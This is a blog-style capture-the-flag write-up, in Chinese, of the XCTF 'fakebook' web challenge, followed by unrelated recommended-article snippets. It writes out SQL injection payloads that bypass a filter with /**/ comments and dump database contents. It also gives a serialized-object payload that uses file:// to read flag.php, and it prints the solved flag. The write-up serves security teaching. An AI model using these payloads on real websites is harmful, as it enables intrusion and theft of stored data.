mlws1900
mlws1900

攻防世界-web-fakebook

攻防世界-web-fakebook_第1张图片

 攻防世界-web-fakebook_第2张图片

打开网页,只有注册和登录选项,

先看看robots.txt有什么

攻防世界-web-fakebook_第3张图片

直接下载一个user.php.bak文件,打开分析

攻防世界-web-fakebook_第4张图片

 设定了姓名,年龄,博客,博客地址利用了正则表达式

攻防世界-web-fakebook_第5张图片

其实也没有https://无所谓 

 选择join选项

攻防世界-web-fakebook_第6张图片

 join成功

 攻防世界-web-fakebook_第7张图片

点开admin

发现?no=1,进行注入点测试

攻防世界-web-fakebook_第8张图片

显示有注入点 ,用order by 测试到4为止可以访问,存在四列

order by 4#

攻防世界-web-fakebook_第9张图片

 查看数据库,发现union select被过滤了,/**/可以绕过waf,获取到数据库

/**/union/**/select 1,group_concat(schema_name),3,4 from information_schema.schemata #

攻防世界-web-fakebook_第10张图片

数据库名fakebook,information_schema,mysql,performance_schema,test 

获取数据表名

/**/union/**/select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema="fakebook"#

攻防世界-web-fakebook_第11张图片

只有一个users 

读取字段

/**/union/**/select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema="fakebook"#

攻防世界-web-fakebook_第12张图片

获得data里面的数据

 /**/union/**/select 1,group_concat(data),3,4 from users#

攻防世界-web-fakebook_第13张图片 数据被序列化

 瞬间没了思路,随便输入一个flag.php试试

存在这样的php文件,只是没法读取内容,利用file进行内容读取【file:///文件路径(ssrf)】 

 /**/union/**/select 1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:3:"aaa";s:3:"age";i:14;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'#

攻防世界-web-fakebook_第14张图片

查看源代码 

 点击蓝色攻防世界-web-fakebook_第15张图片

找到flag

flag{c1e552fdf77049fabf65168f22f7aeab}

你可能感兴趣的:(攻防世界web,ctf,安全,php,前端)

  • 【网络安全】OSI网络安全体系结构 Hacker_Fuchen web安全网络安全
    1.OSI安全体系结构概述1.1背景与目的OSI安全体系结构是在开放式系统互联(OSI)参考模型的基础上,为了解决网络通信中的安全问题而提出的。随着计算机网络技术的快速发展,数据传输的安全性变得越来越重要。OSI安全体系结构的提出,旨在为网络通信提供一个标准化的安全框架,确保信息在传输过程中的机密性、完整性和可用性。国际标准化组织(ISO)在20世纪80年代提出了OSI参考模型,随后为了应对日益增
  • 3D Web轻量化引擎HOOPS Communicator如何赋能航空航天制造? 工业3D_大熊 3DCAD开发工具3d制造3D数据可视化3D模型格式转换3D可视化3DWeb轻量化3Dweb可视化
    在当今航空航天制造领域,精确度、效率和协作是推动行业发展的关键要素。随着数字化技术的飞速发展,3DWeb可视化开发包HOOPSCommunicator为航空航天制造带来了革命性的变化。它凭借强大的功能和灵活的应用,助力企业在设计、生产、培训等各个环节实现高效协同和创新优化,成为航空航天制造企业迈向数字化转型的重要工具。本文将深入探讨HOOPSCommunicator在航空航天制造中的广泛应用,揭示
  • [250224] Yaak 2.0:Git集成、WebSocket支持、OAuth认证等 | Zstandard v1.5.7 发布 x-cmd dailybloggitwebsocket网络协议OAuth安全压缩运维
    目录Yaak2.0发布:Git集成、WebSocket支持、OAuth认证等众多功能!Zstandardv1.5.7发布:性能提升,稳定性增强Yaak2.0发布:Git集成、WebSocket支持、OAuth认证等众多功能!Yaak,一款离线、开源且Git友好的桌面应用,用于与HTTP、GraphQL、WebSockets、SSE和gRPC交互,近日发布了2.0版本,带来了众多令人期待的新功能和改
  • 快手弹幕 websocket 分析 2766958292 websocketjavagopython快手快手弹幕ks
    声明:本文章中所有内容仅供学习交流使用,不用于其他任何目的,抓包内容、敏感网址、数据接口等均已做脱敏处理,严禁用于商业用途和非法用途,否则由此产生的一切后果均与作者无关!逆向分析importtimeimportrequestsimportrandomdefgenerate_random_string(t):characters="useandom-26T198340PX75pxJACKVERYMI
  • 如何做好企业档案管理 管理
    企业档案管理是企业日常运营中不可或缺的一部分,直接关系到信息安全、管理效率和法律合规等多个方面。要做好企业档案管理,必须从建立完善的管理制度、选择适合的管理工具、定期进行档案评估与清理、培养员工档案管理意识等多方面入手。这些措施相互配合,共同作用,确保档案管理工作有条不紊地进行。本文将详细探讨如何做好企业档案管理,帮助企业实现档案管理的规范化、标准化和信息化。一、建立完善的档案管理制度企业档案管理
  • 浏览器原生「磁吸」效果!Anchor Positioning 锚点定位神器解析
    从Chrome125开始,支持了一个全新的CSS特性-AnchorPositioning,翻译过来即是锚点定位。在之前的文章中,我们较为系统的讲述了这个新特性的使用,感兴趣的可以翻开一下前文:抢先体验!超强大的AnchorPositioning锚点定位。在本文中,我们将使用锚点定位,实现一个简化版本的Popover功能。下面,我们将一起一探究竟。传统Popover功能长话短说,在日常的前端需求开发
  • JSP基础实践项目:创建交互式网站案例 DIY飞跃计划
    本文还有配套的精品资源,点击获取简介:JSP(JavaServerPages)是一种动态网页技术,通过将HTML与Java代码结合,简化了JavaWeb应用的开发。本案例面向初学者,包含多个JSP页面,演示了数据展示、用户输入处理等功能。页面由静态和动态内容组成,展示了JSP生命周期的三个阶段、内置对象、动作标签等核心概念。还包括JavaBean的使用和MVC设计模式的基础。案例包含JSP文件、J
  • 当Vue组件的复用性不是很高的时候,组件化还有必要用vue吗? 百锦再@新空间代码工作室 包罗万象vue.js前端javascript前端框架组件复用
    图片:Vue作为一个轻量级的前端框架,在个性化开发中的使用非常广泛,尤其是其组件化开发的思想可以有效提升开发效率、可维护性和代码复用性。不过,正如你提到的,当Vue组件的复用性不高时,组件化是否还必要、是否还有使用Vue的必要性就变得有些模糊了。一、Vue组件化开发的优势组件化思想Vue的组件化开发思想,使得开发者可以将UI和业务逻辑划分为不同的模块。每个模块(组件)都可以独立开发、调试、测试和维
  • Docker小游戏 | 使用Docker部署star-battle太空飞船射击小游戏 心随_风动 Docker部署小游戏项目docker容器运维
    Docker小游戏|使用Docker部署star-battle太空飞船射击小游戏前言项目介绍项目简介项目预览二、系统要求环境要求环境检查Docker版本检查检查操作系统版本三、部署star-battle网页小游戏下载镜像创建容器检查容器状态检查服务端口安全设置四、访问star-battle网页小游戏五、总结前言在数字化浪潮奔涌的当下,软件开发与部署的模式正经历着深刻变革,容器化技术脱颖而出,成为众
  • MySQL 教程(超详细,零基础可学、第一篇) m0_74824635 面试学习路线阿里巴巴mysqladb数据库
    目录一、MySQL数据库概述二、MySQL连接1、使用MySQL二进制方式连接2、使用PHP脚本连接MySQL三、MySQL创建数据库1、使用mysqladmin创建数据库2、使用PHP脚本创建数据库四、MySQL删除数据库1、使用mysqladmin删除数据库2、使用PHP脚本删除数据库五、MySQL选择数据库1、从命令提示窗口中选择MySQL数据库2、使用PHP脚本选择MySQL数据库六、My
  • Spring Boot 实际开发中,对输入参数进行合法性校验的几种方案 狂飙程序员 springboot后端javaspring
    在SpringBoot实际开发中,对输入参数进行合法性校验,确保其值是某个枚举类型中定义的值,常见的实现方案有以下几种:方案一:手动校验手动在业务逻辑中进行枚举值的合法性检查。//定义状态枚举enumStatus{ACTIVE,INACTIVE,PENDING}//控制器类importorg.springframework.web.bind.annotation.PostMapping;impor
  • 泛微全面接入DeepSeek大模型,助力组织升级数智化应用场景 泛微OA办公系统 泛微DeepSeek
    近日,泛微公司旗下所有产品全面接入DeepSeek大模型,借助泛微2024年发布的数智大脑Xiaoe.AI,可快捷方便为客户搭建“DeepSeek大模型+专业小模型+智能体”的数智底座,并可量身定制更安全、高效、国产化的数智化解决方案,助力组织管理与业务、财务一体化数智运营升级。在接入DeepSeek大模型后,泛微将借助DeepSeek强大的自然语言处理、机器学习、推理等能力,显著提升泛微各项产品
  • 高校数字化运营平台解决方案:构建统一的服务大厅、业务平台、办公平台,助力打造智慧校园 泛微OA办公系统 高校数字化运营平台泛微智慧校园行政办公高校运营校园服务统一高校
    教育数字化是建设教育强国的重要基础,利用技术和数据助推高校管理转型,从而更好地支撑教学业务开展。近年来,国家多次发布政策,驱动教育行业的数字化转型。《“十四五”国家信息化规划》,推进信息技术、智能技术与教育教学融合的教育教学变革,提升教育信息化基础设施建设水平,构建高质量教育支撑体系;《关于推进教育新型基础设施建设构建高质量教育支撑体系的指导意见》,到2025年,基本形成结构优化、集约高效、安全可
  • 深信服与泛微达成战略合作,携手打造安全可控统一身份管控平台与专属移动APP 泛微OA办公系统 泛微深信服令信通统一身份
    近日,网络安全知名厂商——深信服与泛微达成战略合作,双方将充分发挥在各自领域的专业优势与资源积累,从品牌、产品、技术、渠道等多方面展开深度合作。双方发挥深信服网络安全、云计算与泛微协同管理软件的组合服务优势,在统一身份管控平台与移动数字化产品上实现集成合作,共同助力组织打造:系统更安全、身份更可控、访问更灵活的全程数字化运营平台。强强联合·展开全方位合作-共同服务好客户-01.深信服·零信任平台&
  • JavaEE进阶(1) Spring Web MVC 注解和参数传递 Purified_Soda JavaEE进阶servletspringbootmvcspringjavamaven
    完整版博客:SpringWebMVC注解和参数传递在学习SpringWebMVC时,我们常用不同的注解来处理HTTP请求和响应。SpringMVC提供了一系列的注解,简化了我们的开发工作,让我们能够通过更简洁和可读的方式来处理请求。以下将详细讲解这些注解的使用方式,结合代码示例以及常见的应用场景,帮助大家深入理解SpringMVC中的请求处理。1.@RestController和@RequestM
  • 【2024软考架构案例题】你知道 Es 的几种分词器吗?Standard、Simple、WhiteSpace、Keyword 四种分词器你知道吗? 激流丶 日常elasticsearch大数据搜索引擎
    博主介绍:博主从事应用安全和大数据领域,有8年研发经验,5年面试官经验,Java技术专家,WEB架构师,阿里云专家博主,华为云云享专家,51CTO专家博主⛪️个人社区:个人社区个人主页:个人主页专栏地址:✅Java中级八股文专题:剑指大厂,手撕Java八股文文章目录1.什么是Standard分词器?2.什么是Simple分词器?3.什么是WhiteSpace分词器?4.什么是Keyword分词器?
  • Spring Boot整合MyBatis BugAndWarning SpringBoot的学习springbootmybatistomcatintellijideajava服务器后端
    SpringBoot整合MyBatis在SpringBoot项目中,使用MyBatis是一种十分流行的数据访问方式。相对于Javaweb通过原生JDBC访问数据库,MyBatis的操作会非常的简单。原生JDBC访问数据库使用原生JDBC进行数据库操作如下:加载数据库驱动程序。获取数据库连接。创建Statement/PreparedStatement对象。执行SQL语句。处理查询结果。关闭资源。使用
  • kafka的ACL配置的sasl.kerberos.principal.to.local.rules配置解释 tkgup 常见问题解决方案kafka分布式
    kafka配置acl认证的用户名转换规则1、Kerberos中的介绍2、自定义saslusername3、自定义ssl的用户名4、关于kafka配置kerberos以及开启acl的实践1、Kerberos中的介绍Kerberos关于此配置项的解释https://web.mit.edu/Kerberos/krb5-latest/doc/admin/conf_files/krb5_conf.html中
  • 数据解密技术的应用与未来发展趋势分析 智能计算研究中心 其他
    内容概要数据解密技术作为信息安全领域的重要组成部分,具有广泛的应用前景。随着现代科技的迅速发展,数据解密的方法和手段也在不断演变。在金融安全领域,数据解密技术帮助机构保护客户信息,防止信息泄露与金融诈骗;而在医疗领域,解密措施保证患者隐私数据的安全存储和传递,促进了电子病历系统的有效使用。同时,在网络安全中,数据解密技术与加密算法相辅相成,共同抵御着日益严峻的网络攻击。提示:了解这些技术的实际应用
  • 【软件体系结构】软件体系结构评估 向懒羊羊学习的大猫 软件体系结构
    1.软件体系结构评估概述1.1软件质量属性性能(Performance):关注系统响应时间和吞吐量等关键指标。衡量系统在完成特定功能时的及时性和效率。可靠性(Reliability):系统在意外或错误使用情况下维持功能的能力。包括容错性、健壮性等,确保系统稳定运行。可用性(Availability):系统能够正常运行的时间比例。衡量用户能够访问和使用系统的程度。安全性(Security):系统在提
  • 网络安全常见面试题--含答案 网络安全-杰克 web安全安全
    本文面试题汇总:防范常见的Web攻击重要协议分布层arp协议的工作原理rip协议是什么?rip的工作原理什么是RARP?工作原理OSPF协议?OSPF的工作原理TCP与UDP区别总结什么是三次握手四次挥手?tcp为什么要三次握手?dns是什么?dns的工作原理一次完整的HTTP请求过程Cookies和session区别GET和POST的区别HTTPS和HTTP的区别session的工作原理?htt
  • 【网络安全】PHP常见漏洞分析 网络安全-杰克 web安全php安全
    0x01sql注入漏洞sql注入漏洞,只要是一个懂编程的基本都听说过的,即便你不太了解网络安全,这个漏洞也被大家广泛的知道了,因为它的危害性和影响的深远性。sql注入可以按照接收的元素分为数字型注入和字符型注入。按照注入的语法,可以分为联合注入,布尔注入,延时注入,报错注入,等等。。。也有很多高阶的玩法,主要看编程的功力0x02xss漏洞xss漏洞刚开始很多网站管理员并不太关注,后来随着xss技术
  • 【网络安全】网络安全防护体系 网络安全-杰克 web安全网络安全
    1.网络安全防护体系概述1.1网络安全的重要性网络安全是保护网络空间不受恶意攻击、数据泄露和其他安全威胁的关键。随着数字化转型的加速,网络安全的重要性日益凸显,它不仅关系到个人隐私和企业机密的保护,还涉及到国家安全和社会稳定。据统计,全球每年因网络安全事件造成的经济损失高达数千亿美元,因此,加强网络安全防护已成为全球性的紧迫任务。1.2网络安全防护体系的定义网络安全防护体系是指由一系列相互关联的网
  • 网络安全 linux学习计划 linux网络安全精要 网络安全-杰克 web安全linux学习
    2.使用命令行文件系统层次标准(FHS)是一个文件和目录在Unix和Linux操作系统上面应该如何存储的定义。/bin重要的二进制可执行程序/boot与系统启动有关的文件/etc系统配置文件/home普通用户家目录/lib重要的系统库/media可移动介质的挂载路径/mnt临时的挂载路径/opt可选择安装的软件包/proc与系统内核及进程有关的信息(虚拟的文件系统)/rootroot用户家目录/s
  • 检查SSH安全配置-sshd服务端未认证连接最大并发量配置 itachi-uchiha 操作系统ssh安全运维
    介绍MaxStartups参数指到SSH守护进程的未经身份验证的最大并发连接数。逻辑依据为防止系统因大量待处理的身份验证连接尝试而出现拒绝服务的情况,请使用MaxStartups的速率限制功能来保护sshd登录的可用性,并防止守护进程不堪重负。检查方法执行以下命令验证MaxStartups是否为10:30:60或更严格的限制:sshd-T|awk'$1~/^\s*maxstartups/{spli
  • Springboot后台 uniapp前端 实现文件的下载与上传〖文件上传篇〗 ktoking SpringbootUniapp工具utilSpringboot后台uniapp前端实现文件的下载与上传〖文件
    Springboot实现文件的下载与上传最近一段时间要学习一下springboot为后台的文件上传也下载,前端部分我使用uniapp来写一.springboot后台部分注意Java文件类以抽象的方式代表文件名和目录路径名。该类主要用于文件和目录的创建、文件的查找和文件的删除等。File对象代表磁盘中实际存在的文件和目录点此学习JAVA文件类controller实现上传单个文件(主要看注解)@Req
  • 元搜索 searxng 项目介绍 魔王阿卡纳兹 开源项目观察searxng元搜索开源项目
    SearXNG是一个开源的、可定制的元搜索引擎项目,旨在保护用户隐私并提供安全可靠的搜索体验。以下是关于SearXNG项目的详细介绍:1.项目背景与目标SearXNG是基于SearX的分支,由return42创建并维护。它继承了SearX的核心理念,即通过聚合多个搜索服务和数据库的结果来提供全面的搜索功能,同时严格保护用户隐私。SearXNG的主要目标是为用户提供一个不被追踪、不被分析的搜索环境,
  • Flutter接入FlutterBoost进行跳转,并实现Flutter与Native的通信 氦客 跨平台移动开发FlutterFlutterBoostAndroid接入跳转
    FlutterBoost是什么FlutterBoost是阿里系闲鱼技术团队开源的Flutter插件。FlutterBoost的理念是将Flutter像Webview那样来使用。在现有应用程序中同时管理Native页面和Flutter页面并非易事,FlutterBoost帮你处理页面的映射和跳转,使你只需关心页面的名字和参数即可(通常可以是URL)。如何接入FlutterBoost一般参考Flutt
  • 系统集成项目管理工程师考试大纲第二版 月梦工作室 系统集成项目管理工程师专栏系统集成项目管理工程师
    一、考试说明1.考试要求:(1)掌握计算机软件、网络和信息系统集成知识;(2)掌握系统集成项目管理知识、方法和工具;(3)熟悉信息化知识;(4)熟悉系统集成有关的法律法规、标准、规范;(5)熟悉系统集成项目管理工程师职业道德要求;(6)了解信息安全知识与安全管理体系;(7)了解信息系统工程监理知识;(8)了解信息系统服务管理、软件过程改进等相关体系;(9)熟练阅读和正确理解相关领域的英文资料;2.
  • chromedriver自动下载 —— python (* ̄︶ ̄)(*^▽^*) python开发语言
    #工作实践webdriver自带的ChromeDriverManager().install()方法,对应的驱动地址自从114版本后没有更新了;隔一段时间就需要手动下载驱动,所以写了一个简单的自动更新方法,还有一些不足,勉强够用吧1、查看源码,大致是保存了一个json文件,每次获取driver最后更新版本,并更新到json文件中;然后下载最新的资源并解压到文件夹2、本来想改源码,但是有修改提示,考
  • 面向对象面向过程 3213213333332132 java
    面向对象:把要完成的一件事,通过对象间的协作实现。 面向过程:把要完成的一件事,通过循序依次调用各个模块实现。 我把大象装进冰箱这件事为例,用面向对象和面向过程实现,都是用java代码完成。 1、面向对象 package bigDemo.ObjectOriented; /** * 大象类 * * @Description * @author FuJian
  • Java Hotspot: Remove the Permanent Generation bookjovi HotSpot
      openjdk上关于hotspot将移除永久带的描述非常详细,http://openjdk.java.net/jeps/122   JEP 122: Remove the Permanent Generation Author Jon Masamitsu Organization Oracle Created 2010/8/15 Updated 2011/
  • 正则表达式向前查找向后查找,环绕或零宽断言 dcj3sjt126com 正则表达式
    向前查找和向后查找 1. 向前查找:根据要匹配的字符序列后面存在一个特定的字符序列(肯定式向前查找)或不存在一个特定的序列(否定式向前查找)来决定是否匹配。.NET将向前查找称之为零宽度向前查找断言。     对于向前查找,出现在指定项之后的字符序列不会被正则表达式引擎返回。 2. 向后查找:一个要匹配的字符序列前面有或者没有指定的
  • BaseDao 171815164 seda
    import java.sql.Connection; import java.sql.DriverManager; import java.sql.SQLException; import java.sql.PreparedStatement; import java.sql.ResultSet; public class BaseDao { public Conn
  • Ant标签详解--Java命令 g21121 Java命令
            这一篇主要介绍与java相关标签的使用         终于开始重头戏了,Java部分是我们关注的重点也是项目中用处最多的部分。           1
  • [简单]代码片段_电梯数字排列 53873039oycg 代码
           今天看电梯数字排列是9 18 26这样呈倒N排列的,写了个类似的打印例子,如下:       import java.util.Arrays; public class 电梯数字排列_S3_Test { public static void main(S
  • Hessian原理 云端月影 hessian原理
    Hessian 原理分析 一.      远程通讯协议的基本原理 网络通信需要做的就是将流从一台计算机传输到另外一台计算机,基于传输协议和网络 IO 来实现,其中传输协议比较出名的有 http 、 tcp 、 udp 等等, http 、 tcp 、 udp 都是在基于 Socket 概念上为某类应用场景而扩展出的传输协
  • 区分Activity的四种加载模式----以及Intent的setFlags aijuans android
      在多Activity开发中,有可能是自己应用之间的Activity跳转,或者夹带其他应用的可复用Activity。可能会希望跳转到原来某个Activity实例,而不是产生大量重复的Activity。 这需要为Activity配置特定的加载模式,而不是使用默认的加载模式。 加载模式分类及在哪里配置 Activity有四种加载模式: standard singleTop
  • hibernate几个核心API及其查询分析 antonyup_2006 html.netHibernatexml配置管理
    (一)  org.hibernate.cfg.Configuration类         读取配置文件并创建唯一的SessionFactory对象.(一般,程序初始化hibernate时创建.)         Configuration co
  • PL/SQL的流程控制 百合不是茶 oraclePL/SQL编程循环控制
    PL/SQL也是一门高级语言,所以流程控制是必须要有的,oracle数据库的pl/sql比sqlserver数据库要难,很多pl/sql中有的sqlserver里面没有   流程控制; 分支语句 if 条件 then 结果 else 结果 end if ; 条件语句 case when 条件 then 结果; 循环语句 loop
  • 强大的Mockito测试框架 bijian1013 mockito单元测试
    一.自动生成Mock类        在需要Mock的属性上标记@Mock注解,然后@RunWith中配置Mockito的TestRunner或者在setUp()方法中显示调用MockitoAnnotations.initMocks(this);生成Mock类即可。二.自动注入Mock类到被测试类  &nbs
  • 精通Oracle10编程SQL(11)开发子程序 bijian1013 oracle数据库plsql
    /* *开发子程序 */ --子程序目是指被命名的PL/SQL块,这种块可以带有参数,可以在不同应用程序中多次调用 --PL/SQL有两种类型的子程序:过程和函数 --开发过程 --建立过程:不带任何参数 CREATE OR REPLACE PROCEDURE out_time IS BEGIN DBMS_OUTPUT.put_line(systimestamp); E
  • 【EhCache一】EhCache版Hello World bit1129 Hello world
    本篇是EhCache系列的第一篇,总体介绍使用EhCache缓存进行CRUD的API的基本使用,更细节的内容包括EhCache源代码和设计、实现原理在接下来的文章中进行介绍   环境准备 1.新建Maven项目   2.添加EhCache的Maven依赖 <dependency> <groupId>ne
  • 学习EJB3基础知识笔记 白糖_ beanHibernatejbosswebserviceejb
    最近项目进入系统测试阶段,全赖袁大虾领导有力,保持一周零bug记录,这也让自己腾出不少时间补充知识。花了两天时间把“传智播客EJB3.0”看完了,EJB基本的知识也有些了解,在这记录下EJB的部分知识,以供自己以后复习使用。   EJB是sun的服务器端组件模型,最大的用处是部署分布式应用程序。EJB (Enterprise JavaBean)是J2EE的一部分,定义了一个用于开发基
  • angular.bootstrap boyitech AngularJSAngularJS APIangular中文api
    angular.bootstrap 描述:     手动初始化angular。     这个函数会自动检测创建的module有没有被加载多次,如果有则会在浏览器的控制台打出警告日志,并且不会再次加载。这样可以避免在程序运行过程中许多奇怪的问题发生。   使用方法:     angular .
  • java-谷歌面试题-给定一个固定长度的数组,将递增整数序列写入这个数组。当写到数组尾部时,返回数组开始重新写,并覆盖先前写过的数 bylijinnan java
    public class SearchInShiftedArray { /** * 题目:给定一个固定长度的数组,将递增整数序列写入这个数组。当写到数组尾部时,返回数组开始重新写,并覆盖先前写过的数。 * 请在这个特殊数组中找出给定的整数。 * 解答: * 其实就是“旋转数组”。旋转数组的最小元素见http://bylijinnan.iteye.com/bl
  • 天使还是魔鬼?都是我们制造 ducklsl 生活教育情感
    ----------------------------剧透请原谅,有兴趣的朋友可以自己看看电影,互相讨论哦!!!     从厦门回来的动车上,无意中瞟到了书中推荐的几部关于儿童的电影。当然,这几部电影可能会另大家失望,并不是类似小鬼当家的电影,而是关于“坏小孩”的电影!     自己挑了两部先看了看,但是发现看完之后,心里久久不能平
  • [机器智能与生物]研究生物智能的问题 comsci 生物
          我想,人的神经网络和苍蝇的神经网络,并没有本质的区别...就是大规模拓扑系统和中小规模拓扑分析的区别....       但是,如果去研究活体人类的神经网络和脑系统,可能会受到一些法律和道德方面的限制,而且研究结果也不一定可靠,那么希望从事生物神经网络研究的朋友,不如把
  • 获取Android Device的信息 dai_lm android
    String phoneInfo = "PRODUCT: " + android.os.Build.PRODUCT; phoneInfo += ", CPU_ABI: " + android.os.Build.CPU_ABI; phoneInfo += ", TAGS: " + android.os.Build.TAGS; ph
  • 最佳字符串匹配算法(Damerau-Levenshtein距离算法)的Java实现 datamachine java算法字符串匹配
    原文:http://www.javacodegeeks.com/2013/11/java-implementation-of-optimal-string-alignment.html------------------------------------------------------------------------------------------------------------
  • 小学5年级英语单词背诵第一课 dcj3sjt126com englishword
    long 长的 show 给...看,出示 mouth 口,嘴 write 写   use 用,使用 take 拿,带来 hand 手 clever 聪明的   often 经常 wash 洗 slow 慢的 house 房子   water 水 clean 清洁的 supper 晚餐 out 在外   face 脸,
  • macvim的使用实战 dcj3sjt126com macvim
    macvim用的是mac里面的vim, 只不过是一个GUI的APP, 相当于一个壳   1. 下载macvim https://code.google.com/p/macvim/   2. 了解macvim :h               vim的使用帮助信息 :h macvim  
  • java二分法查找 蕃薯耀 java二分法查找二分法java二分法
    java二分法查找 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 蕃薯耀 2015年6月23日 11:40:03 星期二 http:/
  • Spring Cache注解+Memcached hanqunfeng springmemcached
    Spring3.1 Cache注解  依赖jar包: <!-- simple-spring-memcached --> <dependency> <groupId>com.google.code.simple-spring-memcached</groupId> <artifactId>simple-s
  • apache commons io包快速入门 jackyrong apache commons
    原文参考 http://www.javacodegeeks.com/2014/10/apache-commons-io-tutorial.html   Apache Commons IO 包绝对是好东西,地址在http://commons.apache.org/proper/commons-io/,下面用例子分别介绍:   1)  工具类   2
  • 如何学习编程 lampcy java编程C++c
    首先,我想说一下学习思想.学编程其实跟网络游戏有着类似的效果.开始的时候,你会对那些代码,函数等产生很大的兴趣,尤其是刚接触编程的人,刚学习第一种语言的人.可是,当你一步步深入的时候,你会发现你没有了以前那种斗志.就好象你在玩韩国泡菜网游似的,玩到一定程度,每天就是练级练级,完全是一个想冲到高级别的意志力在支持着你.而学编程就更难了,学了两个月后,总是觉得你好象全都学会了,却又什么都做不了,又没有
  • 架构师之spring-----spring3.0新特性的bean加载控制@DependsOn和@Lazy nannan408 Spring3
    1.前言。    如题。 2.描述。    @DependsOn用于强制初始化其他Bean。可以修饰Bean类或方法,使用该Annotation时可以指定一个字符串数组作为参数,每个数组元素对应于一个强制初始化的Bean。 @DependsOn({"steelAxe","abc"}) @Comp
  • Spring4+quartz2的配置和代码方式调度 Everyday都不同 代码配置spring4quartz2.x定时任务
    前言:这些天简直被quartz虐哭。。因为quartz 2.x版本相比quartz1.x版本的API改动太多,所以,只好自己去查阅底层API……   quartz定时任务必须搞清楚几个概念: JobDetail——处理类 Trigger——触发器,指定触发时间,必须要有JobDetail属性,即触发对象 Scheduler——调度器,组织处理类和触发器,配置方式一般只需指定触发
  • Hibernate入门 tntxia Hibernate
      前言   使用面向对象的语言和关系型的数据库,开发起来很繁琐,费时。由于现在流行的数据库都不面向对象。Hibernate 是一个Java的ORM(Object/Relational Mapping)解决方案。   Hibernte不仅关心把Java对象对应到数据库的表中,而且提供了请求和检索的方法。简化了手工进行JDBC操作的流程。   如
  • Math类 xiaoxing598 Math
    一、Java中的数字(Math)类是final类,不可继承。 1、常数 PI:double圆周率 E:double自然对数 2、截取(注意方法的返回类型) double ceil(double d) 返回不小于d的最小整数 double floor(double d) 返回不大于d的整最大数 int round(float f) 返回四舍五入后的整数 long round
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他